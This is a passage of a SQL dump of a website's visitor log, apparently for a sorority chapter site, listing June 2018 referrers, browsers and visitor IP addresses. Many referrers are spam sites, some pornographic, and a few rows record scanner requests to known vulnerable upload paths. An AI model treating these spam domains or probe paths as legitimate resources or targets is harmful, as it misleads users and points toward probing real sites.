hiblgz.org','Chrome','Windows','26.0.1410.43','','62.210.13.58','000',1,0),(32235,'2018-06-25','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.27','000',1,0),(32236,'2018-06-25','http://www.bing.com/search?q=history+of+zeta+phi+beta+sorority&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=','MSIE','Windows','9.0','','23.101.169.3','000',2,0),(32237,'2018-06-25','https://dawlenie.com/','Opera','Windows','8.01','','46.118.113.218','000',1,0),(32238,'2018-06-25','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.29','000',1,0),(32239,'2018-06-25','https://www.google.com/','Chrome','Windows','67.0.3396.99','','184.191.76.141','000',2,0),(32240,'2018-06-25','https://zphiblgz.org/event-categories/community-event/','AppleWebKit','Windows','534','','40.77.178.77','000',1,0),(32241,'2018-06-25','http://prostitutki-rostova.ru.com/','Opera','Windows','7.54','','46.118.117.97','000',1,0),(32242,'2018-06-25','http://elementspluss.ru/','Opera','Windows','7.54','','46.185.119.21','000',3,0),(32243,'2018-06-25','https://zphiblgz.org','Firefox','Linux','45.0','','86.110.116.119','000',2,0),(32244,'2018-06-25','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.35','000',1,0),(32245,'2018-06-25','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.57.233.99','000',2,0),(32246,'2018-06-25','http://shops-ru.ru/','Opera','Windows','9.0','','46.119.126.184','000',2,0),(32247,'2018-06-25','https://luckybull.io/','Unknown','Unknown','Unknown','','46.119.126.184','000',3,0),(32248,'2018-06-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','47.96.233.222','000',2,0),(32249,'2018-06-25','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.28','000',1,0),(32250,'2018-06-25','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',1,0),(32251,'2018-06-25','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.28','000',1,0),(32252,'2018-06-26','https://zphiblgz.org','Firefox','Windows','40.1','','94.62.77.98','000',2,0),(32253,'2018-06-26','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','165.227.226.68','000',2,0),(32254,'2018-06-26','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.27','000',1,0),(32255,'2018-06-26','https://zphiblgz.org','Chrome','Windows','58.0.3029.96','','39.104.118.143','000',5,0),(32256,'2018-06-26','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',2,0),(32257,'2018-06-26','https://zphiblgz.org','Firefox','Windows','40.1','','41.36.58.215','000',2,0),(32258,'2018-06-26','http://skinali.photo-clip.ru/','Opera','Windows','8.00','','46.119.118.153','000',1,0),(32259,'2018-06-26','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1830.u-hT7piaeatM8Yh5PwxYpppeFK7g4Fp1nHFiTTcVJTI.b4b49b3384b6d8ef7ac3d55b0e087c88e6720a1a&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041a2NJbnlPQUlqZC1jSW5Ia1k3NVJYNVNvbXowSWVkNHA1MzFKcGdZbi1XUSws&sign=752633dde84f1af21f0f766edc4ccc80&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','198.199.116.213','000',2,0),(32260,'2018-06-26','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1830.EtN2f89Dtvsg5Kz6l73F7HReJlZJUSa0FKDKe01b4hE.72ab6c819e52156087d3e72240125d3e4abeb464&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042dG9tSl9Nb2s1QXZQdnNCMjllR01HX1VMMC1CZEphbDFLY3hoSkVPcEljQSws&sign=1d37560a38a4397afa6797045fa7ae39&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','103.102.45.13','000',2,0),(32261,'2018-06-26','http://yandex.ru/yandsearch?text=https://yandex.ru/clck/jsredir%3Ffrom%3Dyandex.ru%253Bsearch%253Bweb%253B%253B%26text%3D%26etext%3D1831.4gHBUGh7ESmk5uEpMx4A4Mt7Z3OiHiDlzrH8wSdidnohkGwGT4yzR1GEdmWX5VrS.eb589915a490ef72d0b6c2c6d5bd632f2c5e494d%26uuid%3D%26state%3D_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YG-XUIUpxKrkaoPisARVvB8%26data%3DUlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWS2QyTmlLa2U3TXAzek1TV25fM21EWUVldUtqbkZmdlVjYzFVdl9UWVoyVEFiRjNGOXJjU0pK%26b64e%3D2%26sign%3D9b9d3e0eb8a9bba930b26a8463636a6a%26keyno%3D0%26cst%3DAiuY0DBWFJ7IXge4WdYJQYpgPUyh7uQlGHjqXidpbHUaPYbnnE56TOtv2ygoqf0CS3W8qvg7gLF3-3mvLz5HywzNLHur8r1JBiqFmANrsTTFfOMz6pQxXTt_tOhXm_s0B_1Ju5K9dCAOdxR7APi_YsysCPLP_J41%26ref%3DorjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWuAUzT58TqAW7N4kv9-VqEyDvLgZbXeM_7hdAdaQzz95OK3uGXg-BfLsn6BEhT2KdDVrJIqhJ32A%26l10n%3Dru%26cts%3D1530009081971%26mc%3D4.97363989156&lr=213','MSIE','Windows','8.0','','95.143.26.51','000',1,0),(32262,'2018-06-26','http://yandex.ru/yandsearch?text=https://yandex.ru/clck/jsredir%3Ffrom%3Dyandex.ru%253Bsearch%253Bweb%253B%253B%26text%3D%26etext%3D1831.4gHBUGh7ESmk5uEpMx4A4Mt7Z3OiHiDlzrH8wSdidnohkGwGT4yzR1GEdmWX5VrS.eb589915a490ef72d0b6c2c6d5bd632f2c5e494d%26uuid%3D%26state%3D_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YG-XUIUpxKrkaoPisARVvB8%26data%3DUlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWS2QyTmlLa2U3TXAzek1TV25fM21EWUVldUtqbkZmdlVjYzFVdl9UWVoyVEFiRjNGOXJjU0pK%26b64e%3D2%26sign%3D9b9d3e0eb8a9bba930b26a8463636a6a%26keyno%3D0%26cst%3DAiuY0DBWFJ7IXge4WdYJQYpgPUyh7uQlGHjqXidpbHUaPYbnnE56TOtv2ygoqf0CS3W8qvg7gLF3-3mvLz5HywzNLHur8r1JBiqFmANrsTTFfOMz6pQxXTt_tOhXm_s0B_1Ju5K9dCAOdxR7APi_YsysCPLP_J41%26ref%3DorjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWuAUzT58TqAW7N4kv9-VqEyDvLgZbXeM_7hdAdaQzz95OK3uGXg-BfLsn6BEhT2KdDVrJIqhJ32A%26l10n%3Dru%26cts%3D1530009081971%26mc%3D4.97363989156&lr=213','MSIE','Windows','8.0','','89.178.17.0','000',1,0),(32263,'2018-06-26','https://zphiblgz.org/','MSIE','Windows','8.0','','95.28.81.29','000',1,0),(32264,'2018-06-26','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1830.Cy77ec7i-KMzYna5HXibBQ2RjOwrXLJdB0LJeRHSwc4.3e911b42be64289f9622f4d94ec19c88215069db&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041a3c2bmtiVERUMkxKOEx2a2pqNVVRRlMtQW5YVmk1b2pzTG14VV80MUpiQSws&sign=198c7ac236ca6eae8f3c452859976f0a&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','46.101.39.238','000',2,0),(32265,'2018-06-26','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1830.FpSLOQIlQ9LG98MR_2wgPzrvevk7MtS0SC2IAkJM-oc.94d4753959b0e0b88d3c00d617236d345193dce9&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043Tlh6YnVPcW1kRDJub1J2YmpxNzAtS0xINzYxdEYtOGNsZ1d4aktBbkxoUSws&sign=62ace8bcf93be02a8014327e63bd05b2&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','52.58.155.179','000',2,0),(32266,'2018-06-26','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.29','000',1,0),(32267,'2018-06-26','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1830.AUrZIS2lBtSo7Ffdv6Zs3rPfegxi47REHsXgS8QkjOQ.68c1ed6f82aaf12abdc931db537362af365c9327&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042dFFfZ09TOVFHc3NxMGRYNGs2Y3dkMVZpRTM5ZnZWSXphMUFfZEJaNkJtQSws&sign=1fcf6b52221b3be5d5f82e7d5d0b1cc5&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.46.90','000',2,0),(32268,'2018-06-26','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.32','000',1,0),(32269,'2018-06-26','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.32','000',1,0),(32270,'2018-06-26','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.32','000',1,0),(32271,'2018-06-26','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.32','000',1,0),(32272,'2018-06-26','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=12&ved=0ahUKEwjxjaT_vfHbAhUBXawKHQE1A_gQFghUMAs&url=https%3A%2F%2Fzphiblgz.org%2F&usg=AOvVaw3q4W_LfCjivY3GRWBdIE5d','MSIE','Windows','11.0','','216.99.180.220','000',4,0),(32273,'2018-06-26','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.27','000',1,0),(32274,'2018-06-26','https://zphiblgz.org','Firefox','Windows','40.1','','171.49.208.108','000',2,0),(32275,'2018-06-26','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','93.115.86.9','000',1,0),(32276,'2018-06-26','https://zphiblgz.org','Safari','Macintosh','11.0','','64.191.166.26','000',1,0),(32277,'2018-06-26','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.27','000',1,0),(32278,'2018-06-26','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.27','000',1,0),(32279,'2018-06-26','http://viagra-soft.ru/','Opera','Windows','7.54','','46.118.113.218','000',2,0),(32280,'2018-06-26','https://gandikapper.ru/','Opera','Windows','9.0','','46.119.118.153','000',2,0),(32281,'2018-06-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.27','000',2,0),(32282,'2018-06-26','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','52.53.201.78','000',2,0),(32283,'2018-06-26','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.29','000',1,0),(32284,'2018-06-26','http://xn-----7kcaaxchbbmgncr7chzy0k0hk.xn--p1ai/','Opera','Windows','9.00','','46.119.118.153','000',2,0),(32285,'2018-06-26','https://modforwot.ru/','Unknown','Unknown','Unknown','','46.118.117.97','000',3,0),(32286,'2018-06-26','http://xn----ctbigni3aj4h.xn--p1ai/','MSIE','Windows','5.0','','46.118.117.97','000',2,0),(32287,'2018-06-26','https://eduserver.net/','Unknown','Unknown','Unknown','','46.119.126.184','000',2,0),(32288,'2018-06-26','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',3,0),(32289,'2018-06-26','https://zphiblgz.org','Chrome','Windows','47.0.2526.106','','207.99.15.85','000',2,0),(32290,'2018-06-26','http://zphiblgz.org/wp-content/plugins/fluid_forms/file-upload/server/php/','Chrome','Windows','42.0.2311.152','','193.201.224.210','000',1,0),(32291,'2018-06-26','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.29','000',1,0),(32292,'2018-06-26','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.29','000',1,0),(32293,'2018-06-26','https://zphiblgz.org','Chrome','Chrome OS','66.0.3359.203','','69.143.127.21','000',4,0),(32294,'2018-06-26','http://moneyzzz.ru/','MSIE','Windows','6.0','','46.185.119.21','000',5,0),(32295,'2018-06-26','https://www.google.com/','Chrome','Windows','67.0.3396.99','','73.80.51.253','000',3,0),(32296,'2018-06-26','https://zphiblgz.org','Firefox','Windows','56.0','','50.63.197.211','000',1,0),(32297,'2018-06-26','https://www.google.com/','Chrome','Windows','67.0.3396.87','','100.16.219.197','000',28,0),(32298,'2018-06-26','http://www.zphibmaryland.org/chapters/','Chrome','Android','67.0.3396.81','','96.244.107.39','000',3,0),(32299,'2018-06-26','https://www.google.com/','Firefox','Windows','60.0','','100.16.219.197','000',3,0),(32300,'2018-06-26','https://ofermerah.com/','Opera','Windows','7.60','','46.118.113.218','000',2,0),(32301,'2018-06-26','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','137.74.169.241','000',1,0),(32302,'2018-06-26','http://m.facebook.com','AppleWebKit','iPhone','605.1.15','','74.96.166.44','000',1,0),(32303,'2018-06-26','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.188.194','000',1,0),(32304,'2018-06-27','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','159.65.20.58','000',2,0),(32305,'2018-06-27','https://zphiblgz.org','Chrome','Windows','34.0.1847.131','','107.152.246.253','000',1,0),(32306,'2018-06-27','http://lerporn.info/','MSIE','Windows','6.0','','46.118.117.97','000',1,0),(32307,'2018-06-27','https://zphiblgz.org','wu','Unknown','Unknown','','185.35.63.2','000',1,0),(32308,'2018-06-27','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.30','000',1,0),(32309,'2018-06-27','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1831.6DnKUS3QvOJoLvi5w-dTDZclHuqjd4P8DPhnP4FQZNc.72842ad28385b31c41bc8cdb7b8cc8d4b663d912&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043NElfTV9MQWJFaUEwNUZub3VSTkUxTlRMWXo0NVV4ZFJjdXI3WFBhOXpuZyws&sign=4e15d5d372a183393638ce1d2512358b&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','146.185.183.235','000',2,0),(32310,'2018-06-27','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1831.h9Fp7mH8nFH1tKgda4WloM7sR9Wc5YNax5Z1WXljFCE.3d929ba763019f4c6179ff5fd26e11291c14d449&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042MHRnSVlIaWRVYUdXN29BOHBZaEY1UHZhbzQtbndMbENvRnZ3cWR5c3JxUSws&sign=aa622d04c9133f1ccb89c74257fca0f5&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','185.127.16.212','000',2,0),(32311,'2018-06-27','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1831.dvbipE4L-1jfq259WYN7JuK-S7JGEM_KqUDXmFE8cC8.f01dd829bc6dd18b352a34b186da8defff72e270&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042VW54dTZtdkxQZ292bmhqSC01R25fZWhsNEtFMTdxWE13cGdpX1hiN0VUZyws&sign=19cbda9403ac884e23f44b05a1297015&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.111.39','000',2,0),(32312,'2018-06-27','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1831.k7D4q9V2kz_ouDfu5PO-qAhYJwbO6OinC7U-pKQAj4k.e8e6c7312b7858bedb221e38a6ec8e004d04c763&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042Qy1pRG9GVklFQzlaNExrbjc4c1RDTll2bEdQRHdiMy1CLVE1Y3RhVUVtUSws&sign=11ccad4cb7f28a7fc339dc1dbd5f02a2&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.193.5','000',2,0),(32313,'2018-06-27','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1831.ARFuFX5KeHcoDKCWIh5pvIG1tqbO7a1zBigX8a5UqKQ.c857dd0b2dfc425e71d4533f66b3ffce8edadb5b&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042SmxtZTBHR0gwVElIbll5bF9qaWlDWmZ6SnRPMHFIQmxqRXVlanlRV1FtQSws&sign=7d173c2e9a09ef30bb800cf50fbe55d8&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','18.218.204.103','000',2,0),(32314,'2018-06-27','http://pornoplen.com/','Opera','Windows','7.60','','46.119.126.184','000',3,0),(32315,'2018-06-27','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.178.136','000',1,0),(32316,'2018-06-27','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',1,0),(32317,'2018-06-27','https://zphiblgz.org','Chrome','Macintosh','67.0.3396.87','','166.62.126.3','000',2,0),(32318,'2018-06-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.185.16.228','000',4,0),(32319,'2018-06-27','https://www.google.com/','Chrome','Windows','67.0.3396.87','','216.99.180.220','000',4,0),(32320,'2018-06-27','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.28','000',1,0),(32321,'2018-06-27','http://moneyzzz.ru/','Opera','Windows','9.00','','46.118.117.97','000',1,0),(32322,'2018-06-27','zphiblgz.org','en','Unknown','Unknown','','196.47.64.42','000',1,0),(32323,'2018-06-27','https://zphiblgz.org','Firefox','Windows','40.1','','95.76.3.246','000',2,0),(32324,'2018-06-27','android-app://com.google.android.googlequicksearchbox','Chrome','Android','67.0.3396.87','','174.255.204.85','000',2,0),(32325,'2018-06-27','http://www.tsatu.edu.ua/','Unknown','Unknown','Unknown','','46.119.126.184','000',2,0),(32326,'2018-06-27','https://zphiblgz.org/service/youth/','AppleWebKit','Windows','534','','199.30.25.29','000',1,0),(32327,'2018-06-27','https://zphiblgz.org','Safari','Macintosh','11.0.3','','5.9.112.6','000',1,0),(32328,'2018-06-27','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(32329,'2018-06-27','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.29','000',1,0),(32330,'2018-06-27','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.29','000',1,0),(32331,'2018-06-27','https://zphiblgz.org','python-requests','Unknown','2.18.4','','209.150.108.10','000',1,0),(32332,'2018-06-27','https://www.google.com/','Chrome','Windows','67.0.3396.87','','71.179.165.194','000',1,0),(32333,'2018-06-27','http://burger-imperia.com/','Chrome','Linux','37.0.2062.120','','144.217.80.80','000',1,0),(32334,'2018-06-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','104.196.199.240','000',1,0),(32335,'2018-06-27','https://zphiblgz.org','Chrome','Linux','69.0.3452.0','','104.196.199.240','000',2,0),(32336,'2018-06-27','https://moinozhki.com/','Unknown','Unknown','Unknown','','46.118.113.218','000',2,0),(32337,'2018-06-27','https://www.bing.com/','Edge','Windows','13.10586','','170.115.248.21','000',3,0),(32338,'2018-06-27','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.31','000',1,0),(32339,'2018-06-27','https://zphiblgz.org','Firefox','Windows','52.0','','45.33.72.115','000',1,0),(32340,'2018-06-27','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.31','000',1,0),(32341,'2018-06-27','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.30','000',1,0),(32342,'2018-06-27','http://jjbabskoe.ru/','Unknown','Unknown','Unknown','','46.119.118.153','000',1,0),(32343,'2018-06-27','http://burger-imperia.com/','Chrome','Linux','37.0.2062.120','','199.249.223.44','000',1,0),(32344,'2018-06-27','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','46.101.31.105','000',2,0),(32345,'2018-06-28','https://zphiblgz.org','Mnogosearch-3','Unknown','Unknown','','173.49.24.118','000',1,0),(32346,'2018-06-28','http://sladkoevideo.com/','Unknown','Unknown','Unknown','','46.118.113.218','000',3,0),(32347,'2018-06-28','http://xn-----7kcaaxchbbmgncr7chzy0k0hk.xn--p1ai/','MSIE','Windows','5.0','','46.119.118.153','000',2,0),(32348,'2018-06-28','https://zphiblgz.org','MSIE','Windows','11.0','','5.196.54.215','000',1,0),(32349,'2018-06-28','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1832.jEVvgR9McTSsY3-fZLDVwh2cJyZE45zGLsMPo8KSt-Y.be037ee9b02cc3b72f18d118038d1db40b7af4ab&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040U3R2VDU0WVY3RTBOR3dNajRBaW5HREVLZDR3Z0tPVWNrY0NqVmw1dUtJUSws&sign=741c5d3745bfcb36b1ff3171c2fe3d0d&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','192.241.169.202','000',2,0),(32350,'2018-06-28','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1832.KeqUAOQZ-UicBYRUc1JsYBIA1LdWeMTcjwpqEK--ntw.9a9089a962afa08bbe32209748cdac164c8d3da6&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042NmV6amc5cDZySENHNnlSRUFUYmxDRGdCSm9Fekh5ZGVFT0Z4NzFva2lBUSws&sign=5bf93c97472542cc4e1fb2f4fff38bc1&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','89.145.162.8','000',2,0),(32351,'2018-06-28','https://zphiblgz.org','Chrome','Windows','37.0.2049.0','','138.197.135.130','000',2,0),(32352,'2018-06-28','https://zphiblgz.org','Chrome','Windows','24.0.1295.0','','138.197.135.130','000',2,0),(32353,'2018-06-28','https://zphiblgz.org','Chrome','Windows','36.0.1985.67','','138.197.135.130','000',2,0),(32354,'2018-06-28','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1832.Yb_h7u4TNXdsMKhNcyXK26MibE_pxeNfLNmNhly9VjM.d0fbf3fa349ba7871213fc14f9452cfe6c65c4ea&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040ZGRuMGJOU3poXzRwdUpYSmlGTlJaZG4zcWpKai1UQTQtWUYxNlZUcFk1Zyws&sign=5a3803c07aeb0ff720f70d56b244a6ad&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','46.101.17.70','000',2,0),(32355,'2018-06-28','https://zpcompression.us/comments/feed/','WWW-Mechanize','Unknown','1.86','','184.64.209.205','000',4,0),(32356,'2018-06-28','https://zphiblgz.org','python-requests','Unknown','2.9.1','','188.166.34.95','000',1,0),(32357,'2018-06-28','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.35','000',1,0),(32358,'2018-06-28','http://www.zphiblgz.org/wp-content/uploader.php','Chrome','Windows','42.0.2311.152','','69.12.66.247','000',2,0),(32359,'2018-06-28','https://zphiblgz.org','Chrome','Windows','50.0.2661.75','','94.250.254.148','000',1,0),(32360,'2018-06-28','http://comp-pomosch.ru/','Opera','Windows','7.0','','46.119.126.184','000',2,0),(32361,'2018-06-28','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.28','000',1,0),(32362,'2018-06-28','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.28','000',1,0),(32363,'2018-06-28','https://hyip-zanoza.me/','Opera','Windows','7.60','','46.118.113.218','000',1,0),(32364,'2018-06-28','https://zphiblgz.org','Chrome','Macintosh','55.0.2883.95','','61.151.178.166','000',1,0),(32365,'2018-06-28','https://gandikapper.ru/','Opera','Windows','9.0','','46.119.118.153','000',2,0),(32366,'2018-06-28','http://xn-----6kcamwewcd9bayelq.xn--p1ai/','Opera','Windows','9.00','','46.118.117.97','000',1,0),(32367,'2018-06-28','http://zphiblgz.org/wp-content/uploader.php','Chrome','Windows','42.0.2311.152','','62.210.83.132','000',1,0),(32368,'2018-06-28','http://www.zphibmaryland.org/chapters/','Safari','Macintosh','11.1','','166.91.10.218','000',16,0),(32369,'2018-06-28','http://www.zphibmaryland.org/chapters/','Safari','iPhone','11.0','','174.205.10.232','000',7,0),(32370,'2018-06-28','https://lm.facebook.com/','Safari','iPhone','11.0','','208.58.82.22','000',3,0),(32371,'2018-06-28','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.27','000',1,0),(32372,'2018-06-28','https://zphiblgz.org','ZoomBot','Unknown','Unknown','','18.185.136.40','000',2,0),(32373,'2018-06-28','http://www.zphibmaryland.org/chapters/','Safari','iPad','11.0','','166.137.240.78','000',1,0),(32374,'2018-06-28','http://www.zphibmaryland.org/chapters/','Safari','iPad','11.0','','107.77.202.91','000',2,0),(32375,'2018-06-28','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.27','000',1,0),(32376,'2018-06-28','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',5,0),(32377,'2018-06-28','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.27','000',1,0),(32378,'2018-06-28','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(32379,'2018-06-28','http://zphiblgz.org/','Chrome','Windows','54.8.3310.8682','','185.156.177.76','000',2,0),(32380,'2018-06-28','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.30','000',1,0),(32381,'2018-06-28','https://www.google.com/','Chrome','iPhone','67.0.3396.87','','107.77.202.47','000',2,0),(32382,'2018-06-28','https://lm.facebook.com/','Safari','iPhone','11.0','','174.205.17.26','000',3,0),(32383,'2018-06-28','https://odiabetikah.com/','Opera','Windows','7.11','','46.118.113.218','000',1,0),(32384,'2018-06-28','https://www.google.com/','Chrome','Windows','67.0.3396.87','','73.197.0.2','000',3,0),(32385,'2018-06-28','http://porno-chaman.info/','Opera','Windows','7.60','','46.118.117.97','000',3,0),(32386,'2018-06-28','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','52.53.201.78','000',2,0),(32387,'2018-06-28','https://zphiblgz.org','Safari','Macintosh','11.1','','71.179.15.195','000',3,0),(32388,'2018-06-28','https://www.g